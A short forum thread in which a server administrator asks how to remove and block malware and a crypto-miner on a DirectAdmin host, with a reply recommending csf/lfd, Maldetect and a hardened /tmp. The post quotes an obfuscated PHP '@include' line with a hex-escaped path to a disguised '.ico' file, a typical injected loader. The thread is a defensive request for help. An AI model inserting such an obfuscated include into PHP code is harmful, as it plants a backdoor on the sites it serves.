How to block malware/crypto?

Hi,

I have a lot malware on server with DA.

Example:

PHP Code:

/*a34c6*/

@include "x2fhx6fmx65/x66ax73tx77ax6cix63hx2fdx6fmx61ix6esx2fdx65sx6bix65gx7aox74yx63zx6eex2eex75/x70ux62lx69cx5fhx74mx6c/x6dox64ux6cex73/x70hx7aax75fx61nx65ox70ix6eix65/x75px67rx61dx65/x66ax76ix63ox6e_x634x63bx328x2eix63o";

/*a34c6*/

or another files with hashes.

In /tmp/ have files with name "phpas2sad986f_3987fg" - this is crypto mining script.

How to block for future this server?

Do you have secured your /tmp and installed csf/lfd and Maldetect?

Because these files don't come there by themselves, they have to be put there via a leak piece of software or a vulnarable script on a website or something.

I dont have csf/lfd, but now istalled csf.

I have maldetect, but without remove/move files to quarantine.
malware 440 I can remove. Files with malware 441 need to be exist, but only first line to be modyfine.

How I can secure /tmp?